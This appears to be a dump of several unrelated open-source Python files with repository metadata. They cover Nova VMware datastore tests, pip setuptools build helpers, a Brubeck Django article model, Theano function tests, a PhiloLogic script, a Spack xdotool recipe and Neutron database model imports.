self.assertEqual('[ds] fake/path', name) datacenter = kwargs.get('datacenter') self.assertEqual('fake-dc-ref', datacenter) createParentDirectories = kwargs.get('createParentDirectories') self.assertTrue(createParentDirectories) with mock.patch.object(self.session, '_call_method', fake_call_method): ds_path = ds_obj.DatastorePath('ds', 'fake/path') ds_util.mkdir(self.session, ds_path, 'fake-dc-ref') def test_file_exists(self): def fake_call_method(module, method, *args, **kwargs): if method == 'SearchDatastore_Task': ds_browser = args[0] self.assertEqual('fake-browser', ds_browser) datastorePath = kwargs.get('datastorePath') self.assertEqual('[ds] fake/path', datastorePath) return 'fake_exists_task' # Should never get here self.fail() def fake_wait_for_task(task_ref): if task_ref == 'fake_exists_task': result_file = fake.DataObject() result_file.path = 'fake-file' result = fake.DataObject() result.file = [result_file] result.path = '[ds] fake/path' task_info = fake.DataObject() task_info.result = result return task_info # Should never get here self.fail() with contextlib.nested( mock.patch.object(self.session, '_call_method', fake_call_method), mock.patch.object(self.session, '_wait_for_task', fake_wait_for_task)): 
ds_path = ds_obj.DatastorePath('ds', 'fake/path') file_exists = ds_util.file_exists(self.session, 'fake-browser', ds_path, 'fake-file') self.assertTrue(file_exists) def test_file_exists_fails(self): def fake_call_method(module, method, *args, **kwargs): if method == 'SearchDatastore_Task': return 'fake_exists_task' # Should never get here self.fail() def fake_wait_for_task(task_ref): if task_ref == 'fake_exists_task': raise vexc.FileNotFoundException() # Should never get here self.fail() with contextlib.nested( mock.patch.object(self.session, '_call_method', fake_call_method), mock.patch.object(self.session, '_wait_for_task', fake_wait_for_task)): ds_path = ds_obj.DatastorePath('ds', 'fake/path') file_exists = ds_util.file_exists(self.session, 'fake-browser', ds_path, 'fake-file') self.assertFalse(file_exists) def _mock_get_datastore_calls(self, *datastores): """Mock vim_util calls made by get_datastore.""" datastores_i = [None] # For the moment, at least, this list of datastores is simply passed to # get_properties_for_a_collection_of_objects, which we mock below. We # don't need to over-complicate the fake function by worrying about its # contents. fake_ds_list = ['fake-ds'] def fake_call_method(module, method, *args, **kwargs): # Mock the call which returns a list of datastores for the cluster if (module == ds_util.vim_util and method == 'get_dynamic_property' and args == ('fake-cluster', 'ClusterComputeResource', 'datastore')): fake_ds_mor = fake.DataObject() fake_ds_mor.ManagedObjectReference = fake_ds_list return fake_ds_mor # Return the datastore result sets we were passed in, in the order # given if (module == ds_util.vim_util and method == 'get_properties_for_a_collection_of_objects' and args[0] == 'Datastore' and args[1] == fake_ds_list): # Start a new iterator over given datastores datastores_i[0] = iter(datastores) return next(datastores_i[0]) # Continue returning results from the current iterator. 
if (module == ds_util.vutil and method == 'continue_retrieval'): try: return next(datastores_i[0]) except StopIteration: return None if (method == 'continue_retrieval' or method == 'cancel_retrieval'): return # Sentinel that get_datastore's use of vim has changed self.fail('Unexpected vim call in get_datastore: %s' % method) return mock.patch.object(self.session, '_call_method', side_effect=fake_call_method) def test_get_datastore(self): fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(fake.Datastore()) fake_objects.add_object(fake.Datastore("fake-ds-2", 2048, 1000, False, "normal")) fake_objects.add_object(fake.Datastore("fake-ds-3", 4096, 2000, True, "inMaintenance")) with self._mock_get_datastore_calls(fake_objects): result = ds_util.get_datastore(self.session, 'fake-cluster') self.assertEqual("fake-ds", result.name) self.assertEqual(units.Ti, result.capacity) self.assertEqual(500 * units.Gi, result.freespace) def test_get_datastore_with_regex(self): # Test with a regex that matches with a datastore datastore_valid_regex = re.compile("^openstack.*\d$") fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(fake.Datastore("openstack-ds0")) fake_objects.add_object(fake.Datastore("fake-ds0")) fake_objects.add_object(fake.Datastore("fake-ds1")) with self._mock_get_datastore_calls(fake_objects): result = ds_util.get_datastore(self.session, 'fake-cluster', datastore_valid_regex) self.assertEqual("openstack-ds0", result.name) def test_get_datastore_with_token(self): regex = re.compile("^ds.*\d$") fake0 = fake.FakeRetrieveResult() fake0.add_object(fake.Datastore("ds0", 10 * units.Gi, 5 * units.Gi)) fake0.add_object(fake.Datastore("foo", 10 * units.Gi, 9 * units.Gi)) setattr(fake0, 'token', 'token-0') fake1 = fake.FakeRetrieveResult() fake1.add_object(fake.Datastore("ds2", 10 * units.Gi, 8 * units.Gi)) fake1.add_object(fake.Datastore("ds3", 10 * units.Gi, 1 * units.Gi)) with self._mock_get_datastore_calls(fake0, fake1): result = ds_util.get_datastore(self.session, 'fake-cluster', regex) self.assertEqual("ds2", result.name) def test_get_datastore_with_list(self): # Test with a regex containing whitelist of datastores datastore_valid_regex = re.compile("(openstack-ds0|openstack-ds2)") fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(fake.Datastore("openstack-ds0")) fake_objects.add_object(fake.Datastore("openstack-ds1")) fake_objects.add_object(fake.Datastore("openstack-ds2")) with self._mock_get_datastore_calls(fake_objects): result = ds_util.get_datastore(self.session, 'fake-cluster', datastore_valid_regex) self.assertNotEqual("openstack-ds1", result.name) def test_get_datastore_with_regex_error(self): # Test with a regex that has no match # Checks if code raises DatastoreNotFound with a specific message datastore_invalid_regex = re.compile("unknown-ds") exp_message = ("Datastore regex %s did not match any datastores" % datastore_invalid_regex.pattern) fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(fake.Datastore("fake-ds0")) fake_objects.add_object(fake.Datastore("fake-ds1")) # assertRaisesRegExp would have been a good choice instead of # try/catch block, but it's available only from Py 2.7. 
try: with self._mock_get_datastore_calls(fake_objects): ds_util.get_datastore(self.session, 'fake-cluster', datastore_invalid_regex) except exception.DatastoreNotFound as e: self.assertEqual(exp_message, e.args[0]) else: self.fail("DatastoreNotFound Exception was not raised with " "message: %s" % exp_message) def test_get_datastore_without_datastore(self): self.assertRaises(exception.DatastoreNotFound, ds_util.get_datastore, fake.FakeObjectRetrievalSession(None), cluster="fake-cluster") def test_get_datastore_inaccessible_ds(self): data_store = fake.Datastore() data_store.set("summary.accessible", False) fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(data_store) with self._mock_get_datastore_calls(fake_objects): self.assertRaises(exception.DatastoreNotFound, ds_util.get_datastore, self.session, 'fake-cluster') def test_get_datastore_ds_in_maintenance(self): data_store = fake.Datastore() data_store.set("summary.maintenanceMode", "inMaintenance") fake_objects = fake.FakeRetrieveResult() fake_objects.add_object(data_store) with self._mock_get_datastore_calls(fake_objects): self.assertRaises(exception.DatastoreNotFound, ds_util.get_datastore, self.session, 'fake-cluster') def test_get_datastore_no_host_in_cluster(self): def fake_call_method(module, method, *args, **kwargs): return '' with mock.patch.object(self.session, '_call_method', fake_call_method): self.assertRaises(exception.DatastoreNotFound, ds_util.get_datastore, self.session, 'fake-cluster') def _test_is_datastore_valid(self, accessible=True, maintenance_mode="normal", type="VMFS", datastore_regex=None, ds_types=ds_util.ALL_SUPPORTED_DS_TYPES): propdict = {} propdict["summary.accessible"] = accessible propdict["summary.maintenanceMode"] = maintenance_mode propdict["summary.type"] = type propdict["summary.name"] = "ds-1" return ds_util._is_datastore_valid(propdict, datastore_regex, ds_types) def test_is_datastore_valid(self): for ds_type in ds_util.ALL_SUPPORTED_DS_TYPES: self.assertTrue(self._test_is_datastore_valid(True, "normal", ds_type)) def test_is_datastore_valid_inaccessible_ds(self): self.assertFalse(self._test_is_datastore_valid(False, "normal", "VMFS")) def test_is_datastore_valid_ds_in_maintenance(self): self.assertFalse(self._test_is_datastore_valid(True, "inMaintenance", "VMFS")) def test_is_datastore_valid_ds_type_invalid(self): self.assertFalse(self._test_is_datastore_valid(True, "normal", "vfat")) def test_is_datastore_valid_not_matching_regex(self): datastore_regex = re.compile("ds-2") self.assertFalse(self._test_is_datastore_valid(True, "normal", "VMFS", datastore_regex)) def test_is_datastore_valid_matching_regex(self): datastore_regex = re.compile("ds-1") self.assertTrue(self._test_is_datastore_valid(True, "normal", "VMFS", datastore_regex))
nikesh-mahalka/nova
nova/tests/unit/virt/vmwareapi/test_ds_util.py
Python
apache-2.0
20,458
import sys from pip._internal.utils.typing import MYPY_CHECK_RUNNING if MYPY_CHECK_RUNNING: from typing import List, Optional, Sequence # Shim to wrap setup.py invocation with setuptools # # We set sys.argv[0] to the path to the underlying setup.py file so # setuptools / distutils don't take the path to the setup.py to be "-c" when # invoking via the shim. This avoids e.g. the following manifest_maker # warning: "warning: manifest_maker: standard file '-c' not found". _SETUPTOOLS_SHIM = ( "import sys, setuptools, tokenize; sys.argv[0] = {0!r}; __file__={0!r};" "f=getattr(tokenize, 'open', open)(__file__);" "code=f.read().replace('\\r\\n', '\\n');" "f.close();" "exec(compile(code, __file__, 'exec'))" ) def make_setuptools_shim_args( setup_py_path, # type: str global_options=None, # type: Sequence[str] no_user_config=False, # type: bool unbuffered_output=False # type: bool ): # type: (...) -> List[str] """ Get setuptools command arguments with shim wrapped setup file invocation. :param setup_py_path: The path to setup.py to be wrapped. :param global_options: Additional global options. :param no_user_config: If True, disables personal user configuration. :param unbuffered_output: If True, adds the unbuffered switch to the argument list. """ args = [sys.executable] if unbuffered_output: args += ["-u"] args += ["-c", _SETUPTOOLS_SHIM.format(setup_py_path)] if global_options: args += global_options if no_user_config: args += ["--no-user-cfg"] return args def make_setuptools_bdist_wheel_args( setup_py_path, # type: str global_options, # type: Sequence[str] build_options, # type: Sequence[str] destination_dir, # type: str ): # type: (...) -> List[str] # NOTE: Eventually, we'd want to also -S to the flags here, when we're # isolating. Currently, it breaks Python in virtualenvs, because it # relies on site.py to find parts of the standard library outside the # virtualenv. args = make_setuptools_shim_args( setup_py_path, global_options=global_options, unbuffered_output=True ) args += ["bdist_wheel", "-d", destination_dir] args += build_options return args def make_setuptools_clean_args( setup_py_path, # type: str global_options, # type: Sequence[str] ): # type: (...) -> List[str] args = make_setuptools_shim_args( setup_py_path, global_options=global_options, unbuffered_output=True ) args += ["clean", "--all"] return args def make_setuptools_develop_args( setup_py_path, # type: str global_options, # type: Sequence[str] install_options, # type: Sequence[str] no_user_config, # type: bool prefix, # type: Optional[str] home, # type: Optional[str] use_user_site, # type: bool ): # type: (...) -> List[str] assert not (use_user_site and prefix) args = make_setuptools_shim_args( setup_py_path, global_options=global_options, no_user_config=no_user_config, ) args += ["develop", "--no-deps"] args += install_options if prefix: args += ["--prefix", prefix] if home is not None: args += ["--home", home] if use_user_site: args += ["--user", "--prefix="] return args def make_setuptools_egg_info_args( setup_py_path, # type: str egg_info_dir, # type: Optional[str] no_user_config, # type: bool ): # type: (...) 
-> List[str] args = make_setuptools_shim_args(setup_py_path) if no_user_config: args += ["--no-user-cfg"] args += ["egg_info"] if egg_info_dir: args += ["--egg-base", egg_info_dir] return args def make_setuptools_install_args( setup_py_path, # type: str global_options, # type: Sequence[str] install_options, # type: Sequence[str] record_filename, # type: str root, # type: Optional[str] prefix, # type: Optional[str] header_dir, # type: Optional[str] home, # type: Optional[str] use_user_site, # type: bool no_user_config, # type: bool pycompile # type: bool ): # type: (...) -> List[str] assert not (use_user_site and prefix) assert not (use_user_site and root) args = make_setuptools_shim_args( setup_py_path, global_options=global_options, no_user_config=no_user_config, unbuffered_output=True ) args += ["install", "--record", record_filename] args += ["--single-version-externally-managed"] if root is not None: args += ["--root", root] if prefix is not None: args += ["--prefix", prefix] if home is not None: args += ["--home", home] if use_user_site: args += ["--user", "--prefix="] if pycompile: args += ["--compile"] else: args += ["--no-compile"] if header_dir: args += ["--install-headers", header_dir] args += install_options return args
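def _example_usage():
    # Illustrative sketch only: a hypothetical setup.py path and empty option
    # lists, showing how the helpers above compose a setup.py invocation.
    args = make_setuptools_bdist_wheel_args(
        "/tmp/pkg/setup.py",
        global_options=[],
        build_options=[],
        destination_dir="/tmp/wheels",
    )
    # Roughly: [sys.executable, "-u", "-c", <shim>, "bdist_wheel", "-d", "/tmp/wheels"]
    return args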
xavfernandez/pip
src/pip/_internal/utils/setuptools_build.py
Python
mit
5,070
# Allow the use of / operator for division to yield floats instead of integers: # http://docs.python.org/whatsnew/2.2.html#pep-238-changing-the-division-operator from __future__ import division # Imports from standard libraries from datetime import date, timedelta import hashlib import os import urllib2 # Imports from Django from django.conf import settings from django.contrib.auth.models import User from django.contrib.contenttypes import generic from django.contrib.contenttypes.models import ContentType from django.contrib.markup.templatetags.markup import markdown from django.contrib.sites.models import Site from django.core.files import File from django.contrib.gis.db import models from django.utils import simplejson # Imports from Brubeck from brubeck.core.models import Content # Imports from other source from pyPdf import PdfFileReader, PdfFileWriter # This is a hippopotamus. # .-''''-. _ # (' ' '0)-/) # '..____..: \._ # \u u ( '-..------._ # | / : '. '--. # .nn_nn/ ( : ' '\ # ( '' '' / ; . \ # ''----' "\ : : '. # .'/ '. # / / '. # /_| ) .\| # | /\ . ' # '--.__| '--._ , / # /'-, .' # / | _.' # (____\ / # \ \ # '-'-'-' class PublishedManager(models.Manager): """ Only returns articles that have been marked as published. This is handy for such content as articles and blog posts that might need editing before being published. """ def get_query_set(self): return super(PublishedManager, self).get_query_set().filter(is_published=True) class Article(Content): """ Provides support for news stories. The workhorse of the site. Some fields in this model might be marked as deprecated. These will be hidden in the admin site. """ TWO_WEEKS_AGO = date.today() - timedelta(14) TYPE_CHOICES = ( ('story', "Story/Brief"), # ('online', "Online Exclusive"), ('online', "Web Update"), ('column', "Column"), ('editorial', "Editorial"), ('letter', "Letter to the Editor"), ('guest', "Guest Column"), ) title = models.CharField(max_length=150, db_index=True) issue = models.ForeignKey('publishing.Issue', db_index=True, help_text="The issue in which this article was published.") section = models.ForeignKey('publishing.Section', db_index=True) layout = models.ForeignKey('design.Layout', db_index=True, blank=True, null=True, db_column='page_id', help_text="Deprecated. In the 2008 site, this held the relation between Layout and Article objects. This relation is now in Layout.articles as a ManyToManyField.") type = models.CharField(max_length=30, db_index=True, choices=TYPE_CHOICES, default='story') priority = models.PositiveIntegerField('priority/page number', db_index=True, default=10, help_text="The lower this number, the higher the article is displayed (compared to other articles published the same day). <strong>You should use the page number for this</strong>, but it isn't strictly required that you do so.<br />If you set this to 0 (the number zero), it will become the top story on the site and be automatically sent out over Twitter.") updated = models.BooleanField(db_index=True, default=False, help_text="Whether or not this article has been updated since it was last posted. If this is checked, the article will show the date and time when it was most recently saved on the front page, the archives and the article page itself.") cdeck = models.CharField('c-deck', max_length=255, blank=True, help_text="The optional text that appears before the article. If provided, this becomes the article's teaser in various places on the site.") body = models.TextField(help_text="The content of the article. 
Accepts HTML (for embeds and such), but primarily uses <a href=\"http://daringfireball.net/projects/markdown/basics\">Markdown</a> formatting. The basics:<ul><li>Separate paragraphs by blank lines.</li><li>Italicize words _like this_.</li><li>Make words (including subheads) bold **like this**.</li><li>Link things like so: Go to [themaneater.com](http://www.themaneater.com/).</li></ul>") photos = models.ManyToManyField('photography.Photo', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Photos attached to this article. (Can select photos published within the last two weeks.)") editorial_cartoons = models.ManyToManyField('comics.EditorialCartoon', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Editorial cartoons attached to this article. (You can select cartoons published within the last two weeks.)") graphics = models.ManyToManyField('design.Graphic', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Graphics attached to this article. (Can select graphics published within the last two weeks.)") attached_files = models.ManyToManyField('multimedia.AttachedFile', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Other files attached to this article. (Can select files uploaded within the last two weeks.)") videos = models.ManyToManyField('multimedia.Video', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Videos attached to this article. (Can select videos published within the last two weeks.)") slideshows = models.ManyToManyField('multimedia.Slideshow', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Slideshows attached to this article. (Can select slideshows published within the last two weeks.)") audio_clips = models.ManyToManyField('multimedia.AudioClip', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Audio clips attached to this article. (Can select audio clips published within the last two weeks.)") podcast_episodes = models.ManyToManyField('podcasts.Episode', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, blank=True, null=True, help_text="Podcast episodes related to this article. (Can select podcast episodes published in the last two weeks.)") tags = models.ManyToManyField('tagging.Tag', blank=True, null=True, help_text="Tags that describe this article.") calendar = models.ForeignKey('events.Calendar', blank=True, null=True, help_text="If we've created a calendar that has to do with the content of this article, select it here.") map = models.ForeignKey('mapping.Map', verbose_name='attached map', blank=True, null=True, help_text="Choose a map to display with this article.") polls = models.ManyToManyField('voxpopuli.Poll', limit_choices_to={'pub_date__gte': TWO_WEEKS_AGO}, verbose_name='attached polls', blank=True, null=True, help_text="Choose a poll to display with this article.") slug = models.SlugField(db_index=True, unique_for_date='pub_date', help_text="Used for URLs. <strong>DO NOT ENTER THE RUNSHEET SLUG.</strong>. 
Autogenerated from title.") blurb = models.TextField(blank=True, help_text="Use this if you would like the top story to show something other than its first 40 words on the front page, or if you would like a story other than the top one to show something other than its c-deck in the archives.") sidebar = models.TextField(blank=True, help_text="Use this if you'd like for specific sidebar content (movie review information, related links, etc.) to show up with the article.") runsheet_slug = models.CharField(max_length=50, blank=True, null=True, help_text="The brief phrase used to describe this article on the runsheet. Helps to ensure articles are given the same priority online and in print.") teaser_photo = models.ImageField(upload_to='%Y/%m%d/articles/teaser-photos', blank=True, null=True, help_text="If this article has a magazine-style illustration (for use with top stories on MOVE and Columbia Prowl), upload it here.") mediatype = 'article' # Managers--both the default (normal behavior) and one that just returns # published articles. objects = models.GeoManager() get_published = PublishedManager() def __unicode__(self): return self.title def save(self, *args, **kwargs): # FIXME: Look into ping_google and how it was used before. try: if self.body.count('\r\n\r\n') or self.body.count('\n\n'): pass else: self.body = self.body.replace('\r', '') self.body = self.body.replace('\n', '\r\n\r\n') except: pass super(Article, self).save(*args, **kwargs) def get_absolute_url(self): if self.section.publication.name == 'Columbia Prowl': return 'http://%s/renters-guide/stories/%s/%s/%s/%s/' % (self.section.publication.site.domain, self.pub_date.year, self.pub_date.month, self.pub_date.day, self.slug) else: return 'http://%s/stories/%s/%s/%s/%s/' % (self.section.publication.site.domain, self.pub_date.year, self.pub_date.month, self.pub_date.day, self.slug) class Meta: get_latest_by = 'pub_date' ordering = ['issue', '-pub_date', 'priority', 'section', 'title'] from brubeck.core.moderation import AkismetModerator from brubeck.core.emailing.views import render_email_and_send from django.conf import settings from django.contrib.comments.moderation import moderator class ArticleModerator(AkismetModerator): enable_field = 'enable_comments' def email(self, comment, content_object, request): moderators = [] chief = settings.EDITORS['chief'] moderators.append(chief) managing = settings.EDITORS['managing'] moderators.append(managing) online_dev = settings.EDITORS['online_dev'] moderators.append(online_dev) context = {'comment': comment, 'content_object': content_object} subject = 'New comment awaiting moderation on "%s"' % content_object render_email_and_send(context=context, message_template='core/comment_notification_email.txt', subject=subject, recipients=moderators) def moderate(self, comment, content_object, request): return True moderator.register(Article, ArticleModerator) class Correction(models.Model): """ Provides support for publishing corrections to articles. This model is edited inline as part of the Article change page. """ article = models.ForeignKey(Article) date_corrected = models.DateTimeField() correction = models.CharField(max_length=500) def __unicode__(self): return "Correction to %s" % self.article class Meta: get_latest_by = 'date_corrected' ordering = ['-date_corrected', 'article']
albatrossandco/brubeck_cms
brubeck/articles/models.py
Python
bsd-3-clause
11,291
import six.moves.cPickle as pickle import os import shutil import tempfile import unittest import numpy import theano from theano.compile.io import In def test_function_dump(): v = theano.tensor.vector() fct1 = theano.function([v], v + 1) try: tmpdir = tempfile.mkdtemp() fname = os.path.join(tmpdir, 'test_function_dump.pkl') theano.function_dump(fname, [v], v + 1) f = open(fname, 'rb') l = pickle.load(f) f.close() finally: if tmpdir is not None: shutil.rmtree(tmpdir) fct2 = theano.function(**l) x = [1, 2, 3] assert numpy.allclose(fct1(x), fct2(x)) class TestFunctionIn(unittest.TestCase): def test_in_strict(self): a = theano.tensor.dvector() b = theano.shared(7) out = a + b f = theano.function([In(a, strict=False)], out) # works, rand generates float64 by default f(numpy.random.rand(8)) # works, casting is allowed f(numpy.array([1, 2, 3, 4], dtype='int32')) f = theano.function([In(a, strict=True)], out) try: # fails, f expects float64 f(numpy.array([1, 2, 3, 4], dtype='int32')) except TypeError: pass def test_explicit_shared_input(self): # This is not a test of the In class per se, but the In class relies # on the fact that shared variables cannot be explicit inputs a = theano.shared(1.0) self.assertRaises(TypeError, theano.function, [a], a + 1) def test_in_shared_variable(self): # Ensure that an error is raised if the In wrapped is used to wrap # a shared variable a = theano.shared(1.0) a_wrapped = In(a, update=a + 1) self.assertRaises(TypeError, theano.function, [a_wrapped]) def test_in_mutable(self): a = theano.tensor.dvector() a_out = a * 2 # assuming the op which makes this "in place" triggers # using mutable=True will let f change the value in aval f = theano.function([In(a, mutable=True)], a_out, mode='FAST_RUN') aval = numpy.random.rand(10) aval2 = aval.copy() assert numpy.all(f(aval) == (aval2 * 2)) assert not numpy.all(aval == aval2) # using mutable=False should leave the input untouched f = theano.function([In(a, mutable=False)], a_out, mode='FAST_RUN') aval = numpy.random.rand(10) aval2 = aval.copy() assert numpy.all(f(aval) == (aval2 * 2)) assert numpy.all(aval == aval2) def test_in_update(self): a = theano.tensor.dscalar('a') f = theano.function([In(a, value=0.0, update=a + 1)], a, mode='FAST_RUN') # Ensure that, through the executions of the function, the state of the # input is persistent and is updated as it should assert f() == 0.0 assert f() == 1.0 assert f() == 2.0 def test_in_update_wrong_dtype(self): # Ensure that an error is raised if an In-wrapped variables has # an update of a different type a = theano.tensor.dscalar('a') b = theano.tensor.dvector('b') self.assertRaises(TypeError, In, a, update=b) def test_in_update_shared(self): # Test that using both In() with updates and shared variables with # updates in the same function behaves as expected shared_var = theano.shared(1.0) a = theano.tensor.dscalar('a') a_wrapped = In(a, value=0.0, update=shared_var) f = theano.function([a_wrapped], [], updates={shared_var: a}, mode='FAST_RUN') # Ensure that, through the executions of the function, the state of # the input and the shared variable are appropriate (after N execution, # the values have swapped N times). This allows testing that the # changes occur at the same time and one doesn't overwrite the other. 
for i in range(5): f() assert numpy.allclose(shared_var.get_value(), i % 2) def test_in_allow_downcast_int(self): a = theano.tensor.wvector('a') # int16 b = theano.tensor.bvector('b') # int8 c = theano.tensor.bscalar('c') # int8 f = theano.function([In(a, allow_downcast=True), In(b, allow_downcast=False), In(c, allow_downcast=None)], (a + b + c)) # Both values are in range. Since they're not ndarrays (but lists), # they will be converted, and their value checked. assert numpy.all(f([3], [6], 1) == 10) # Values are in range, but a dtype too large has explicitly been given # For performance reasons, no check of the data is explicitly performed # (It might be OK to change this in the future.) self.assertRaises(TypeError, f, [3], numpy.array([6], dtype='int16'), 1) # Value too big for a, silently ignored assert numpy.all(f([2 ** 20], numpy.ones(1, dtype='int8'), 1) == 2) # Value too big for b, raises TypeError self.assertRaises(TypeError, f, [3], [312], 1) # Value too big for c, raises TypeError self.assertRaises(TypeError, f, [3], [6], 806) def test_in_allow_downcast_floatX(self): a = theano.tensor.fscalar('a') b = theano.tensor.fscalar('b') c = theano.tensor.fscalar('c') f = theano.function([In(a, allow_downcast=True), In(b, allow_downcast=False), In(c, allow_downcast=None)], (a + b + c)) # If the values can be accurately represented, everything is OK assert numpy.all(f(0, 0, 0) == 0) # If allow_downcast is True, idem assert numpy.allclose(f(0.1, 0, 0), 0.1) # If allow_downcast is False, nope self.assertRaises(TypeError, f, 0, 0.1, 0) # If allow_downcast is None, it should work iff floatX=float32 if theano.config.floatX == 'float32': assert numpy.allclose(f(0, 0, 0.1), 0.1) else: self.assertRaises(TypeError, f, 0, 0, 0.1) def test_in_allow_downcast_vector_floatX(self): a = theano.tensor.fvector('a') b = theano.tensor.fvector('b') c = theano.tensor.fvector('c') f = theano.function([In(a, allow_downcast=True), In(b, allow_downcast=False), In(c, allow_downcast=None)], (a + b + c)) # If the values can be accurately represented, everything is OK z = [0] assert numpy.all(f(z, z, z) == 0) # If allow_downcast is True, idem assert numpy.allclose(f([0.1], z, z), 0.1) # If allow_downcast is False, nope self.assertRaises(TypeError, f, z, [0.1], z) # If allow_downcast is None, like False self.assertRaises(TypeError, f, z, z, [0.1])
valexandersaulys/airbnb_kaggle_contest
venv/lib/python3.4/site-packages/Theano-0.7.0-py3.4.egg/theano/compile/tests/test_function.py
Python
gpl-2.0
7,048
#!/usr/bin/env python3 import orjson import os from wsgiref.handlers import CGIHandler from philologic.runtime.DB import DB from philologic.runtime.HitWrapper import ObjectWrapper from philologic.runtime import generate_text_object import sys sys.path.append("..") import custom_functions try: from custom_functions import WebConfig except ImportError: from philologic.runtime import WebConfig try: from custom_functions import WSGIHandler except ImportError: from philologic.runtime import WSGIHandler def get_text_object(environ, start_response): status = "200 OK" headers = [("Content-type", "application/json; charset=UTF-8"), ("Access-Control-Allow-Origin", "*")] start_response(status, headers) config = WebConfig(os.path.abspath(os.path.dirname(__file__)).replace("scripts", "")) db = DB(config.db_path + "/data/") request = WSGIHandler(environ, config) path = config.db_path zeros = 7 - len(request.philo_id) if zeros: request.philo_id += zeros * " 0" obj = ObjectWrapper(request["philo_id"].split(), db) text_object = generate_text_object(request, config) yield orjson.dumps(text_object) if __name__ == "__main__": CGIHandler().run(get_text_object)
ARTFL-Project/PhiloLogic4
www/scripts/get_text_object.py
Python
gpl-3.0
1,243
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Xdotool(MakefilePackage): """fake keyboard/mouse input, window management, and more""" homepage = "https://github.com/jordansissel/xdotool" url = "https://github.com/jordansissel/xdotool/releases/download/v3.20160805.1/xdotool-3.20160805.1.tar.gz" version('3.20160805.1', sha256='35be5ff6edf0c620a0e16f09ea5e101d5173280161772fca18657d83f20fcca8') version('3.20160804.2', sha256='2251671c3c3dadab2b70e08bd87f2de6338c7b4e64e7e2d2d881fd13f9bff72c') version('3.20160804.1', sha256='7a76ee57515cc767a00a768f1d04c703279d734255a34f8027c29178561fdce9') version('3.20150503.1', sha256='e8326883bd5e91bede7336cbee186e6e9143f40b3fb61c84afc9bb31b87e96d1') depends_on('libxext') depends_on('libxtst') depends_on('libxi') depends_on('libx11') depends_on('inputproto') depends_on('libxinerama') depends_on('libxkbcommon') def edit(self, spec, prefix): env['PREFIX'] = prefix makefile = FileFilter('Makefile') makefile.filter('xdotool: LDFLAGS+=-Xlinker', '', string=True) makefile.filter('xdotool: LDFLAGS+=-rpath $(INSTALLLIB)', '', string=True)
LLNL/spack
var/spack/repos/builtin/packages/xdotool/package.py
Python
lgpl-2.1
1,385
# Copyright (c) 2014 OpenStack Foundation. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ The module provides all database models at current HEAD. Its purpose is to create comparable metadata with current database schema. Based on this comparison database can be healed with healing migration. """ from neutron.db import agents_db # noqa from neutron.db import agentschedulers_db # noqa from neutron.db import allowedaddresspairs_db # noqa from neutron.db import dvr_mac_db # noqa from neutron.db import external_net_db # noqa from neutron.db import extradhcpopt_db # noqa from neutron.db import extraroute_db # noqa from neutron.db import l3_agentschedulers_db # noqa from neutron.db import l3_attrs_db # noqa from neutron.db import l3_db # noqa from neutron.db import l3_dvrscheduler_db # noqa from neutron.db import l3_gwmode_db # noqa from neutron.db import l3_hamode_db # noqa from neutron.db.metering import metering_db # noqa from neutron.db import model_base from neutron.db import models_v2 # noqa from neutron.db import portbindings_db # noqa from neutron.db import portsecurity_db # noqa from neutron.db import quota_db # noqa from neutron.db import routedserviceinsertion_db # noqa from neutron.db import routerservicetype_db # noqa from neutron.db import securitygroups_db # noqa from neutron.db import servicetype_db # noqa from neutron.plugins.bigswitch.db import consistency_db # noqa from neutron.plugins.bigswitch import routerrule_db # noqa from neutron.plugins.brocade.db import models as brocade_models # noqa from neutron.plugins.cisco.db.l3 import l3_models # noqa from neutron.plugins.cisco.db import n1kv_models_v2 # noqa from neutron.plugins.cisco.db import network_models_v2 # noqa from neutron.plugins.hyperv import model # noqa from neutron.plugins.linuxbridge.db import l2network_models_v2 # noqa from neutron.plugins.metaplugin import meta_models_v2 # noqa from neutron.plugins.ml2.drivers.arista import db # noqa from neutron.plugins.ml2.drivers.brocade.db import ( # noqa models as ml2_brocade_models) from neutron.plugins.ml2.drivers.cisco.apic import apic_model # noqa from neutron.plugins.ml2.drivers.cisco.nexus import ( # noqa nexus_models_v2 as ml2_nexus_models_v2) from neutron.plugins.ml2.drivers import type_flat # noqa from neutron.plugins.ml2.drivers import type_gre # noqa from neutron.plugins.ml2.drivers import type_vlan # noqa from neutron.plugins.ml2.drivers import type_vxlan # noqa from neutron.plugins.ml2 import models # noqa from neutron.plugins.nec.db import models as nec_models # noqa from neutron.plugins.nec.db import packetfilter as nec_packetfilter # noqa from neutron.plugins.nec.db import router # noqa from neutron.plugins.nuage import nuage_models # noqa from neutron.plugins.openvswitch import ovs_models_v2 # noqa from neutron.plugins.vmware.dbexts import lsn_db # noqa from neutron.plugins.vmware.dbexts import maclearning # noqa from neutron.plugins.vmware.dbexts import models as vmware_models # noqa from neutron.plugins.vmware.dbexts import networkgw_db # noqa 
from neutron.plugins.vmware.dbexts import qos_db # noqa from neutron.plugins.vmware.dbexts import vcns_models # noqa def get_metadata(): return model_base.BASEV2.metadata
leeseuljeong/leeseulstack_neutron
neutron/db/migration/models/head.py
Python
apache-2.0
3,827
